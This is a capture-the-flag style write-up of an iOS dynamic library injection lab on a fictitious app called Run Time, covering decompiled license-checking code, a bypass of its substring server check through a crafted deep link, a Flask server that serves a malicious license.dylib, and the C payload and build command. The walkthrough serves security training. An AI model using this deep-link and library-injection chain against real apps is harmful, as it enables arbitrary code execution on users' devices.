Mobile Hacking Lab – Run Time

Description: Welcome to the iOS Application Security Lab: Dynamic Library Injection Challenge. This challenge focuses on a fictitious app called Run Time , which tracks the steps while running. Your objective is to bypass the app’s protections, deliver the exploit and gain code execution utilizing the dynamic library injection.

Run Time MHL

Install an IPA file can be difficult.
So, for make it more easy, I made a YouTube video with the process using Sideloadly.

NOTE: If you have problems with the keyboard and UI (buttons) when you need to hide it on a physical device, you can fix this problem by using the KeyboardTools by @CrazyMind90 found in the Sileo app store.

First let’s understand the app behavior.
I recommend make this flow intercepting all request in burpsuite for a better understanding.

Well, we don’t have many functionalities.
I just can intercept two request:

					GET /runtime/health HTTP/2
User-Agent: Runtime/1 CFNetwork/1410.1 Darwin/22.6.0
Accept: */*
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br


					GET /runtime/payment?license_type=pro HTTP/2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Sec-Fetch-Site: none
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_7_10 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Sec-Fetch-Dest: document

With nothing useful information.
We just have functions like Sync DataSee historyStart free trial and Suscribe now.
Let’s move to Static analysis unzipping the .ipa file.
Looking for Info.plist file, we can se some interesting data

The URL scheme


Wich is runtime://

The Bundle IDcom.mobilehackinglab.runtime (may be for work with frida).
And the SceneDelegate (for custom URL handling).


This can be a little helpful for understanding some behavior of the app

					strings "Runtime" | grep "openURLContexts"

And we can see scene:openURLContexts:
Now it’s time for look some what see in ghidra with strings analysis.

					strings "Runtime" | grep -iE "openURLContexts|suscribe|token|license|checkout|request|runtime://|key"

✨ Output ✨ (sparks because this output will save us a lot of time.)

Invalid license format
Unable to store license file!
Failed to move or load the license file
Failed to load the license file
Cannot connect to host while getting license
Invalid token format

Useful information:

  • Librarylicense.dylib
  • Some Keys references like stringForKey and trialKey
  • URL:
    • runtime://buypro?
    • runtime://starttrial?

Let’s load the binary into ghidra.
We can see the getLicenseFile function, which is

					void __thiscall
          (SubscribeController *this,undefined8 param_1,undefined8 param_2,char *param_3,
          void *param_4)

  URLRequest *pUVar1;
  SubscribeController *pSVar2;

  local_108 = param_2;
  local_20 = this;
  local_190 = (undefined *)Foundation::URLRequest::typeMetadataAccessor();
  local_188 = *(int *)(local_190 + -8);
  local_180 = *(int *)(local_188 + 0x40) + 0xfU & 0xfffffffffffffff0;
  (*(code *)PTR____chkstk_darwin_100024208)();
  puVar6 = (undefined *)((int)&UStack_1f0 - local_180);
  local_170 = extraout_x8 + 0xfU & 0xfffffffffffffff0;
  local_178 = puVar6;
  (*(code *)PTR____chkstk_darwin_100024208)();
  pUVar1 = (URLRequest *)(puVar6 + -local_170);
  local_168 = pUVar1;
  local_28 = pUVar1;
  iVar3 = ___swift_instantiateConcreteTypeFromMangledName
                    ((int *)&$$demangling_cache_variable_for_type_metadata_for_Foundation.URL?);
  local_158 = *(int *)(*(int *)(iVar3 + -8) + 0x40) + 0xfU & 0xfffffffffffffff0;
  (*(code *)PTR____chkstk_darwin_100024208)(local_160);
  iVar3 = (int)pUVar1 - local_158;
  local_d0 = iVar3;
  local_c0 = (undefined *)Foundation::URL::typeMetadataAccessor();
  local_d8 = *(int *)(local_c0 + -8);
  local_140 = *(int *)(local_d8 + 0x40) + 0xfU & 0xfffffffffffffff0;
  uVar8 = local_110;
  uVar7 = local_108;
  pcVar9 = local_150;
  pvVar4 = local_148;
  (*(code *)PTR____chkstk_darwin_100024208)();
  puVar6 = (undefined *)(iVar3 - local_140);
  local_130 = extraout_x8_00 + 0xfU & 0xfffffffffffffff0;
  UVar5.unknown = puVar6;
  local_138.unknown = puVar6;
  (*(code *)PTR____chkstk_darwin_100024208)();
  local_128 = (int)puVar6 - local_130;
  local_58 = this;
  local_50 = pcVar9;
  local_48 = pvVar4;
  local_40 = uVar8;
  local_38 = uVar7;
  local_30 = local_128;
  uVar8 = 1;
  local_60 = this;
  local_70 = (undefined *)Swift::DefaultStringInterpolation::init(local_120,1);
  local_f8 = &local_70;
  local_c4 = 1;
  DVar10.unknown = (undefined *)0x1;
  local_68 = uVar8;
  SVar12 = Swift::String::init("http://",7,1);
  local_118 = SVar12.bridgeObject;
  local_80 = local_110;
  local_78 = local_108;
            ((char)&stack0xfffffffffffffff0 + -0x70,
  DVar10.unknown = (undefined *)(uint)(local_c4 & 1);
  SVar12 = Swift::String::init("/download",9,(__int8)(local_c4 & 1));
  local_100 = SVar12.bridgeObject;
  local_e8.unknown = local_70;
  local_f0 = local_68;
  SVar12 = Swift::String::init(local_e8);
  local_e0 = SVar12.bridgeObject;
  iVar3 = local_d0;
  (**(code **)(local_d8 + 0x30))(local_d0,local_c4,local_c0);
  pUVar1 = local_168;
  if ((sdword)iVar3 == 1) {
    local_1e8 = Swift::String::init("Invalid URL",0xb,1);
    dVar11 = (double)$showToast();
  else {
    (**(code **)(local_d8 + 0x20))(local_128,local_d0,local_c0);
    (**(code **)(local_d8 + 0x10))(local_138.unknown,local_128,local_c0);
    local_1d8.unknown =
         (undefined *)
         $$default_argument_1_of_Foundation.URLRequest.init(url:_Foundation.URL,cachePolicy:___C.NSU RLRequestCachePolicy,timeoutInterval:_Swift.Double)_->_Foundation.URLRequest
    dVar11 = (double)$$default_argument_2_of_Foundation.URLRequest.init(url:_Foundation.URL,cachePol icy:___C.NSURLRequestCachePolicy,timeoutInterval:_Swift.Double)_->_Foundation.URLRequest
    local_1cc = 1;
    forHTTPHeaderField = Swift::String::init("X-API-Key",9,(byte)local_1cc & 1);
    local_1c8 = forHTTPHeaderField.bridgeObject;
    SVar12.bridgeObject = local_148;
    SVar12.str = local_150;
    pSVar2 = local_198;
    pvVar4 = local_1c8;
    (**(code **)((*(uint *)pSVar2 & *(uint *)PTR__swift_isaMask_100024630) + 0x58))();
    UVar5.unknown = local_178;
    local_1b0 = pvVar4;
    (**(code **)(local_188 + 0x10))(local_178,local_168,local_190);
    local_1b8 = Foundation::URLRequest::_bridgeToObjectiveC(UVar5);
    local_1a0 = *(code **)(local_188 + 8);
    puVar6 = &DAT_1000249e8;
    *(SubscribeController **)(puVar6 + 0x10) = local_198;
    local_90 = 
    $$partial_apply_forwarder_for_closure_#1_@Sendable_(Foundation.Data?,__C.NSURLResponse?,Swift.Er ror?)_->_()_in_Runtime.SubscribeController.getLicenseFile(server:_Swift.String,withToken:_Swift. String)_->_()
    local_b0 = PTR___NSConcreteStackBlock_100024248;
    local_a8 = 0x42000000;
    local_a4 = 0;
    local_a0 = 
    $$reabstraction_thunk_helper_from_@escaping_@callee_guaranteed_@Sendable_(@guaranteed_Foundation .Data?,@guaranteed___C.NSURLResponse?,@guaranteed_Swift.Error?)_->_()_to_@escaping_@callee_unown ed_@convention(block)_@Sendable_(@unowned___C.NSData?,@unowned___C.NSURLResponse?,@unowned___C.N SError?)_->_()
    local_98 = &_block_descriptor.12;
    local_88 = puVar6;
    local_1c0 = __Block_copy(&local_b0);
    pvVar4 = local_1b0;
    local_1a8 = pvVar4;
    local_b8 = local_1a8;
    (**(code **)(local_d8 + 8))(local_128,local_c0);

This code build a request where param_1 is the server.
The X-API-Key is param_3, expecting a key.
This request is http://, we can found the line
Swift::String::init("http://",7,1);. And also, we have the endpoint /download in Swift::String::init("/download",9,(__int8)(local_c4 & 1));

The URL looks like: http://<server_url>/download

Also, we have the function suscribeNow that is this code:

					void __thiscall Runtime::SubscribeController::subscribeNow(SubscribeController *this)

  int iVar1;
  undefined *puVar2;
  URL UVar3;
  int extraout_x8;
  String SVar4;
  tuple2.conflict2 tVar5;
  undefined auVar6 [16];
  int local_f0;
  undefined8 local_e8;
  undefined8 local_e0;
  TargetProtocolConformanceDescriptor *local_d8;
  undefined *local_d0;
  NSDictionary *local_c8;
  NSURL *local_c0;
  undefined *local_b8;
  code *local_b0;
  code *local_a8;
  NSURL *local_a0;
  undefined *local_98;
  dword local_8c;
  undefined *local_88;
  uint local_80;
  uint local_78;
  undefined *local_70;
  uint local_68;
  int local_60;
  void *local_58;
  int local_50;
  int local_48;
  undefined4 local_3c;
  undefined *local_38;
  SubscribeController *local_30;
  int local_28;
  SubscribeController *local_20;
  local_88 = PTR_$$type_metadata_for_Any_1000246f8 + 8;
  local_28 = 0;
  local_30 = (SubscribeController *)0x0;
  local_20 = this;
  iVar1 = ___swift_instantiateConcreteTypeFromMangledName
                    ((int *)&$$demangling_cache_variable_for_type_metadata_for_Foundation.URL?);
  local_80 = *(int *)(*(int *)(iVar1 + -8) + 0x40) + 0xfU & 0xfffffffffffffff0;
  (*(code *)PTR____chkstk_darwin_100024208)();
  iVar1 = (int)&local_f0 - local_80;
  local_48 = iVar1;
  local_38 = (undefined *)Foundation::URL::typeMetadataAccessor();
  local_50 = *(int *)(local_38 + -8);
  local_78 = *(int *)(local_50 + 0x40) + 0xfU & 0xfffffffffffffff0;
  (*(code *)PTR____chkstk_darwin_100024208)();
  puVar2 = (undefined *)(iVar1 - local_78);
  local_68 = extraout_x8 + 0xfU & 0xfffffffffffffff0;
  local_70 = puVar2;
  (*(code *)PTR____chkstk_darwin_100024208)();
  local_60 = (int)puVar2 - local_68;
  local_3c = 1;
  local_30 = this;
  local_28 = local_60;
  SVar4 = Swift::String::init("runtime://buypro?",0x2d,1);
  local_58 = SVar4.bridgeObject;
  iVar1 = local_48;
  (**(code **)(local_50 + 0x30))(local_48,local_3c,local_38);
  UVar3.unknown = local_70;
  if ((sdword)iVar1 == 1) {
  else {
    (**(code **)(local_50 + 0x20))(local_60,local_48,local_38);
    puVar2 = &_OBJC_CLASS_$_UIApplication;
    local_b0 = *(code **)(local_50 + 0x10);
    local_98 = puVar2;
    local_a0 = Foundation::URL::_bridgeToObjectiveC(UVar3);
    local_a8 = *(code **)(local_50 + 8);
    puVar2 = local_98;
    local_8c = (dword)puVar2;
    UVar3.unknown = local_70;
    if ((local_8c & 1) == 0) {
    else {
      puVar2 = &_OBJC_CLASS_$_UIApplication;
      local_b8 = puVar2;
      local_c0 = Foundation::URL::_bridgeToObjectiveC(UVar3);
                ((int *)&
                        $$demangling_cache_variable_for_type_metadata_for_(__C.UIApplicationOpenExte rnalURLOptionsKey,Any)
      local_f0 = 0;
      tVar5 = Swift::$_allocateUninitializedArray(0);
      local_e8 = tVar5._0_8_;
      auVar6 = __C::UIApplicationOpenExternalURLOptionsKey::typeMetadataAccessor(local_f0);
      local_e0 = auVar6._0_8_;
      local_d8 = __C::UIApplicationOpenExternalURLOptionsKey::$lazy_protocol_witness_table_accessor
      local_d0 = (undefined *)Swift::Dictionary::$init();
      local_c8 = (extension_Foundation)::Swift::Dictionary::_bridgeToObjectiveC();

We can see that try open an URL
SVar4 = Swift::String::init("runtime://buypro?",0x2d,1);
Also, check if there exist an app that can handle the URL.

But I don’t see nothing useful for us.
There are also another function, trialSubscription

					void __thiscall Runtime::SubscribeController::trialSubscription(SubscribeController *this)

  int iVar1;
  undefined *puVar2;
  URL UVar3;
  int extraout_x8;
  String SVar4;
  tuple2.conflict2 tVar5;
  undefined auVar6 [16];
  int local_f0;
  undefined8 local_e8;
  undefined8 local_e0;
  TargetProtocolConformanceDescriptor *local_d8;
  undefined *local_d0;
  NSDictionary *local_c8;
  NSURL *local_c0;
  undefined *local_b8;
  code *local_b0;
  code *local_a8;
  NSURL *local_a0;
  undefined *local_98;
  dword local_8c;
  undefined *local_88;
  uint local_80;
  uint local_78;
  undefined *local_70;
  uint local_68;
  int local_60;
  void *local_58;
  int local_50;
  int local_48;
  undefined4 local_3c;
  undefined *local_38;
  SubscribeController *local_30;
  int local_28;
  SubscribeController *local_20;
  local_88 = PTR_$$type_metadata_for_Any_1000246f8 + 8;
  local_28 = 0;
  local_30 = (SubscribeController *)0x0;
  local_20 = this;
  iVar1 = ___swift_instantiateConcreteTypeFromMangledName
                    ((int *)&$$demangling_cache_variable_for_type_metadata_for_Foundation.URL?);
  local_80 = *(int *)(*(int *)(iVar1 + -8) + 0x40) + 0xfU & 0xfffffffffffffff0;
  (*(code *)PTR____chkstk_darwin_100024208)();
  iVar1 = (int)&local_f0 - local_80;
  local_48 = iVar1;
  local_38 = (undefined *)Foundation::URL::typeMetadataAccessor();
  local_50 = *(int *)(local_38 + -8);
  local_78 = *(int *)(local_50 + 0x40) + 0xfU & 0xfffffffffffffff0;
  (*(code *)PTR____chkstk_darwin_100024208)();
  puVar2 = (undefined *)(iVar1 - local_78);
  local_68 = extraout_x8 + 0xfU & 0xfffffffffffffff0;
  local_70 = puVar2;
  (*(code *)PTR____chkstk_darwin_100024208)();
  local_60 = (int)puVar2 - local_68;
  local_3c = 1;
  local_30 = this;
  local_28 = local_60;
  SVar4 = Swift::String::init("runtime://starttrial? ABCD"
  local_58 = SVar4.bridgeObject;
  iVar1 = local_48;
  (**(code **)(local_50 + 0x30))(local_48,local_3c,local_38);
  UVar3.unknown = local_70;
  if ((sdword)iVar1 == 1) {
  else {
    (**(code **)(local_50 + 0x20))(local_60,local_48,local_38);
    puVar2 = &_OBJC_CLASS_$_UIApplication;
    local_b0 = *(code **)(local_50 + 0x10);
    local_98 = puVar2;
    local_a0 = Foundation::URL::_bridgeToObjectiveC(UVar3);
    local_a8 = *(code **)(local_50 + 8);
    puVar2 = local_98;
    local_8c = (dword)puVar2;
    UVar3.unknown = local_70;
    if ((local_8c & 1) == 0) {
    else {
      puVar2 = &_OBJC_CLASS_$_UIApplication;
      local_b8 = puVar2;
      local_c0 = Foundation::URL::_bridgeToObjectiveC(UVar3);
                ((int *)&
                        $$demangling_cache_variable_for_type_metadata_for_(__C.UIApplicationOpenExte rnalURLOptionsKey,Any)
      local_f0 = 0;
      tVar5 = Swift::$_allocateUninitializedArray(0);
      local_e8 = tVar5._0_8_;
      auVar6 = __C::UIApplicationOpenExternalURLOptionsKey::typeMetadataAccessor(local_f0);
      local_e0 = auVar6._0_8_;
      local_d8 = __C::UIApplicationOpenExternalURLOptionsKey::$lazy_protocol_witness_table_accessor
      local_d0 = (undefined *)Swift::Dictionary::$init();
      local_c8 = (extension_Foundation)::Swift::Dictionary::_bridgeToObjectiveC();

Which also is from SubscribeController class.
Several local variables are defined, including pointers and structures that are likely to be used to handle URLs, strings and other data.

A string representing a URL (“runtime://starttrial?”) is created and a URL object is initialized.
Also, checks like the previous function with canOpenURL:.

And the ‘most important’ code that we need inspect is the verifyLicense function:

					void __thiscall
          (SubscribeController *this,undefined8 param_1,undefined8 param_2,char *param_3,
          void *param_4,undefined8 param_5,void *param_6)

  SubscribeController *pSVar1;
  bool bVar2;
  int iVar3;
  int iVar4;
  char *pcVar5;

  void *local_58;
  undefined8 local_50;
  undefined8 local_48;
  int local_40;
  int local_38;
  local_160.unknown = PTR_$$type_metadata_for_Swift.String_100024408;
  local_1f8 = PTR_$$type_metadata_for_Any_1000246f8 + 8;
  local_38 = 0;
  local_40 = 0;
  local_50 = 0;
  local_48 = 0;
  local_60 = (char *)0x0;
  local_58 = (void *)0x0;
  local_68 = (SubscribeController *)0x0;
  local_70 = (SubscribeController *)0x0;
  local_120 = 0;
  local_200 = this;
  local_1c0 = param_3;
  local_1b8 = param_4;
  local_170 = param_2;
  local_168 = param_1;
  iVar3 = ___swift_instantiateConcreteTypeFromMangledName
                    ((int *)&$$demangling_cache_variable_for_type_metadata_for_Foundation.Locale?);
  local_1f0 = *(int *)(*(int *)(iVar3 + -8) + 0x40) + 0xfU & 0xfffffffffffffff0;
  (*(code *)PTR____chkstk_darwin_100024208)();
  iVar3 = (int)&local_380 - local_1f0;
  local_1e8 = iVar3;
  iVar4 = ___swift_instantiateConcreteTypeFromMangledName
                    ((int *)&$$demangling_cache_variable_for_type_metadata_for_Foundation.URL?);
  local_1e0 = *(int *)(*(int *)(iVar4 + -8) + 0x40) + 0xfU & 0xfffffffffffffff0;
  (*(code *)PTR____chkstk_darwin_100024208)();
  iVar3 = iVar3 - local_1e0;
  local_1d0 = extraout_x8 + 0xfU & 0xfffffffffffffff0;
  local_1d8 = iVar3;
  (*(code *)PTR____chkstk_darwin_100024208)();
  iVar3 = iVar3 - local_1d0;
  local_1c8 = iVar3;
  local_1b0 = (undefined *)Foundation::URL::typeMetadataAccessor();
  local_1a8 = *(int *)(local_1b0 + -8);
  local_1a0 = *(int *)(local_1a8 + 0x40) + 0xfU & 0xfffffffffffffff0;
  uVar11 = local_168;
  uVar10 = local_170;
  pcVar5 = local_1c0;
  pvVar14 = local_1b8;
  (*(code *)PTR____chkstk_darwin_100024208)();
  iVar3 = iVar3 - local_1a0;
  local_190 = extraout_x8_00 + 0xfU & 0xfffffffffffffff0;
  local_198 = iVar3;
  local_38 = iVar3;
  (*(code *)PTR____chkstk_darwin_100024208)();
  puVar6 = (undefined *)(iVar3 - local_190);
  local_180 = extraout_x8_01 + 0xfU & 0xfffffffffffffff0;
  local_188 = puVar6;
  (*(code *)PTR____chkstk_darwin_100024208)();
  iVar3 = (int)puVar6 - local_180;
  local_178 = iVar3;
  local_68 = this;
  local_60 = pcVar5;
  local_58 = pvVar14;
  local_50 = uVar11;
  local_48 = uVar10;
  local_40 = iVar3;
  local_80 = local_168;
  local_78 = local_170;
  local_70 = this;
  local_90 = Swift::String::init("",0xd,1);
  local_150 = &local_90;
  pcVar5 = Swift::String::$lazy_protocol_witness_table_accessor();
  local_158 = pcVar5;
  bVar2 = (extension_Foundation)::Swift::StringProtocol::$contains((char)local_150);
  local_144 = (dword)CONCAT71(extraout_var,bVar2);
  if ((local_144 & 1) == 0) {
    local_380 = Swift::String::init("Invalid Server",0xe,1);
    dVar15 = (double)$showToast();
  else {
    SVar16 = Swift::String::init("buypro",6,1);
    local_210 = SVar16.bridgeObject;
    SVar17.bridgeObject = local_1b8;
    SVar17.str = local_1c0;
    SVar20.bridgeObject = param_6;
    SVar20.str = pcVar5;
    bVar2 = Swift::String::==_infix(SVar17,SVar16,SVar20);
    local_204 = (dword)CONCAT71(extraout_var_00,bVar2);
    if ((local_204 & 1) != 0) {
      uVar11 = 1;
      local_130 = (undefined *)Swift::DefaultStringInterpolation::init(0x20,1);
      local_230 = &local_130;
      local_23c = 1;
      DVar12.unknown = (undefined *)0x1;
      local_128 = uVar11;
      SVar17 = Swift::String::init("http://",7,1);
      local_248 = SVar17.bridgeObject;
      local_140 = local_168;
      local_138 = local_170;
      DVar12.unknown = (undefined *)(uint)(local_23c & 1);
      SVar17 = Swift::String::init("/payment?license_type=pro",0x19,(__int8)(local_23c & 1));
      local_238 = SVar17.bridgeObject;
      local_220.unknown = local_130;
      local_228 = local_128;
      SVar17 = Swift::String::init(local_220);
      local_218 = SVar17.bridgeObject;
      iVar3 = local_1c8;
      (**(code **)(local_1a8 + 0x30))(local_1c8,1,local_1b0);
      UVar9.unknown = local_188;
      if ((sdword)iVar3 == 1) {
      else {
        (**(code **)(local_1a8 + 0x20))(local_178,local_1c8,local_1b0);
        puVar6 = &_OBJC_CLASS_$_UIApplication;
        local_270 = *(code **)(local_1a8 + 0x10);
        local_258 = puVar6;
        local_260 = Foundation::URL::_bridgeToObjectiveC(UVar9);
        local_268 = *(code **)(local_1a8 + 8);
        puVar6 = local_258;
        local_24c = (dword)puVar6;
        UVar9.unknown = local_188;
        if ((local_24c & 1) == 0) {
        else {
          puVar6 = &_OBJC_CLASS_$_UIApplication;
          local_278 = puVar6;
          local_280 = Foundation::URL::_bridgeToObjectiveC(UVar9);
                    ((int *)&
                            $$demangling_cache_variable_for_type_metadata_for_(__C.UIApplicationOpen ExternalURLOptionsKey,Any)
          local_2b0 = 0;
          tVar18 = Swift::$_allocateUninitializedArray(0);
          local_2a8 = tVar18._0_8_;
          auVar19 = __C::UIApplicationOpenExternalURLOptionsKey::typeMetadataAccessor(local_2b0);
          local_2a0 = auVar19._0_8_;
          local_298 = __C::UIApplicationOpenExternalURLOptionsKey::
          local_290 = (undefined *)Swift::Dictionary::$init();
          local_288 = (extension_Foundation)::Swift::Dictionary::_bridgeToObjectiveC();
    local_a0 = local_1c0;
    local_98 = local_1b8;
    local_2d4 = 1;
    local_b0 = Swift::String::init("^[0-9]{4}-[0-9]{4}-[A-Z]{4}$",0x1c,1);
    local_2d0 = &local_b0;
    local_2e0 = 0;
    LVar7 = Foundation::Locale::typeMetadataAccessor();
    (**(code **)(*(int *)(LVar7.unknown + -8) + 0x38))(local_1e8,1);
    pcVar5 = local_158;
    pSVar8 = local_2d0;
    dVar13 = (dword)local_2e0;
    *(char **)(iVar3 + -0x10) = local_158;
    *(char **)(iVar3 + -8) = pcVar5;
    uVar11 = 0x400;
    local_2c8 = uVar11;
    local_2bc = dVar13;
    local_2b8 = pSVar8;
    local_c8 = local_2b8;
    local_c0 = local_2c8;
    local_b8 = (byte)local_2bc & 1;
    local_2e4 = (dword)((local_2bc & 1) != 0);
    if (local_2e4 != 0) {
      local_2f8 = Swift::String::init("Invalid license format",0x16,1);
      dVar15 = (double)$showToast();
    uVar11 = 1;
    local_d8 = (undefined *)Swift::DefaultStringInterpolation::init(0xe,1);
    local_318 = &local_d8;
    local_330 = 7;
    local_324 = 1;
    DVar12.unknown = (undefined *)0x1;
    local_d0 = uVar11;
    SVar17 = Swift::String::init("http://",7,1);
    local_338 = SVar17.bridgeObject;
    local_e8 = local_168;
    local_e0 = local_170;
              ((char)&stack0xfffffffffffffff0 + '(',local_160);
    DVar12.unknown = (undefined *)(uint)(local_324 & 1);
    SVar17 = Swift::String::init("/health",(__int16)local_330,(__int8)(local_324 & 1));
    local_320 = SVar17.bridgeObject;
    local_308.unknown = local_d8;
    local_310 = local_d0;
    SVar17 = Swift::String::init(local_308);
    local_300 = SVar17.bridgeObject;
    iVar3 = local_1d8;
    (**(code **)(local_1a8 + 0x30))(local_1d8,1,local_1b0);
    pSVar1 = local_200;
    if ((sdword)iVar3 == 1) {
      local_370 = Swift::String::init("Invalid URL",0xb,1);
      dVar15 = (double)$showToast();
    iVar3 = local_198;
    (**(code **)(local_1a8 + 0x20))(local_198,local_1d8,local_1b0);
    (**(code **)((*(uint *)pSVar1 & *(uint *)PTR__swift_isaMask_100024630) + 0x58))();
    UVar9.unknown = local_188;
    local_350 = iVar3;
    (**(code **)(local_1a8 + 0x10))(local_188,local_198,local_1b0);
    local_358 = Foundation::URL::_bridgeToObjectiveC(UVar9);
    local_340 = *(code **)(local_1a8 + 8);
    puVar6 = &DAT_100024948;
    *(SubscribeController **)(puVar6 + 0x10) = local_200;
    *(SubscribeController **)(puVar6 + 0x18) = local_200;
    *(undefined8 *)(puVar6 + 0x20) = local_168;
    *(undefined8 *)(puVar6 + 0x28) = local_170;
    local_f8 = 
    $$partial_apply_forwarder_for_closure_#1_@Sendable_(Foundation.Data?,__C.NSURLResponse?,Swift.Er ror?)_->_()_in_Runtime.SubscribeController.verifyLicense(server:_Swift.String,key:_Swift.String) _->_()
    local_118 = PTR___NSConcreteStackBlock_100024248;
    local_110 = 0x42000000;
    local_10c = 0;
    local_108 = 
    $$reabstraction_thunk_helper_from_@escaping_@callee_guaranteed_@Sendable_(@guaranteed_Foundation .Data?,@guaranteed___C.NSURLResponse?,@guaranteed_Swift.Error?)_->_()_to_@escaping_@callee_unown ed_@convention(block)_@Sendable_(@unowned___C.NSData?,@unowned___C.NSURLResponse?,@unowned___C.N SError?)_->_()
    local_100 = &_block_descriptor;
    local_f0 = puVar6;
    local_360 = __Block_copy(&local_118);
    iVar3 = local_350;
    local_348 = iVar3;
    local_120 = local_348;

Also, corresponds to SubscribeController class.
Let me explain in deep what this function do.

Server verification
Checks if the server has the string “”, which suggests that it is validating against a specific domain.
If the URL does not contain this string, it displays an “Invalid Server” error message.

Buypro detection
If the license key (param_3) contains the string “buypro”, redirect to a purchase URL (/payment?license_type=pro) by opening it in the browser.
Before opening the URL, check if the device (again) can open the URL (UIApplication canOpenURL:). If possible, open it with openURL:.

Key Validation
Checks if the license key has the regex format ^[0-9]{4}-[0-9]{4}-[A-Z]{4}$ (Example: “1234-5678-ABCD”).
If it does not match, it displays an error message “Invalid license format”.

URL Build
If the license key is valid, it constructs a verification URL http://<server>/health and converts it to a Foundation::URL object.

HTTP Verification
dataTaskWithURL:completionHandler: request is made to the constructed URL.
The completionHandler handles the HTTP response, checking if the key is valid.

So, in short

  • If it passes all validations, it makes an HTTP request to http://<server>/health to verify the license.
  • If the server confirms the license, the app considers it valid.

But now, we need know how license.dylib is loaded in the app, right?
Here’s the code, in this function:
void $$closure_#1_@Sendable_(Foundation.Data?,__C.NSURLResponse?,Swift.Error?)_->_()_in_Runtime.
I’ll use fragment to explain because is a huge function.

If there is no connection to the server, it displays a “Cannot connect to host” error.

					if (local_208 != 0) {
    local_300 = Swift::String::init("Cannot connect to host while getting license");

If the server responds with 401, it displays an authentication failed message.

					if (iVar3 == 0x191) { // 0x191 == 401 Unauthorized
    local_350 = Swift::String::init("Unable to authenticate to server");

Retrieves and verifies the Content-Type of the HTTP response.

					local_398.unknown = (extension_Foundation)::Swift::Dictionary::$_unconditionallyBridgeFromObjectiveC();
local_150 = Swift::String::init("Content-Type",0xc,1);

It ensures that the HTTP code of the response is 200 OK.

					if (local_44c & 1) {
    local_470 = PTR_$$type_metadata_for_Swift.Int_100024540;
    tVar17 = Swift::$_allocateUninitializedArray(2);
    *(undefined8 *)tVar17.1 = 0x12e; // Expected HTTP status code
    *(undefined8 *)((int)tVar17.1 + 8) = 200;

Write the license file to a specific location.


Try to load the license.dylib library into memory.

					local_5d8 = _dlopen(local_1f0,2);

Find and execute the register_device function.

  • If register_device fails, it displays “Device registration failed”.
  • If successful, displays “Upgraded to Pro”.
					if (((uint)pcVar7 & 1) == 0) {
    local_6c8 = Swift::String::init("Device registration failed.");
} else {
    local_6b8 = Swift::String::init("Upgraded to Pro. Please wait for a decade before we add pro features");

Let’s exploit that, please.
First, we need create a local server, then, we send the request (via URL scheme runtine://).
But we need bypass the verification.
We can just do this request:
The verification checks if contains the string, not if the requested server is 😉

Now that we know how to cheat validation, let’s go to:

  • Create a fake server that responds like the original.
  • Serve a malicious license.dylib to execute arbitrary code.
					from flask import Flask, jsonify, request, send_from_directory
import os

app = Flask(__name__)

ROOT_PATH = os.path.dirname(os.path.abspath(__file__))

@app.route('/runtime', methods=['GET', 'POST'])
def handle_runtime():
    query_param = request.args.get('x', default=None)
    if query_param:
        if "/health" in query_param:
            return jsonify({"status": "healthy"})
        if "/activate" in query_param:
            return jsonify({"token": "E621E1F8-C36C-495A-93FC-0C247A3E6E5F"})
        if "/download" in query_param:
            response = send_from_directory(directory=ROOT_PATH, path='license.dylib', as_attachment=True)
            response.headers["Content-Type"] = "application/octet-stream"
            return response
    return jsonify({"error": "Invalid request"}), 400

if __name__ == '__main__':'', port=8080)

Then, python3 and we need see that the server is up

					 * Serving Flask app 'server'
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (
 * Running on
 * Running on
Press CTRL+C to quit

This is our license.c file.

					#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <string.h>

int register_device(void) {
    FILE *file = fopen("license_pwned.txt", "w");
    if (file) {
        fprintf(file, "Exploited!\n");
    return 1;

We need put the file in the same work directory that our flask server.

Now, let’s compile that

					clang -arch arm64 -dynamiclib -o license.dylib license.c

Now we just need open browser and then go to

( is my local IP)

But, for don’t write the whole URL, we can use qrencode tool for just scan the URL.

					qrencode "runtime://starttrial?server=" -o QR.png

Scan the .png and then, open the the Runner app.

We got the responses!

 - - [20/Feb/2025 20:22:26] "GET /runtime? HTTP/1.1" 200 - - - [20/Feb/2025 20:22:26] "POST /runtime? HTTP/1.1" 200 - - - [20/Feb/2025 20:22:26] "GET /runtime? HTTP/1.1" 200 -

So, where the .dylib file was uploaded and our .txt file?
We can use objection for that:
With the app running

					objection -g "Runtime" explore

Then, via SSH we can see in Documents directory:

I hope you found it useful (:

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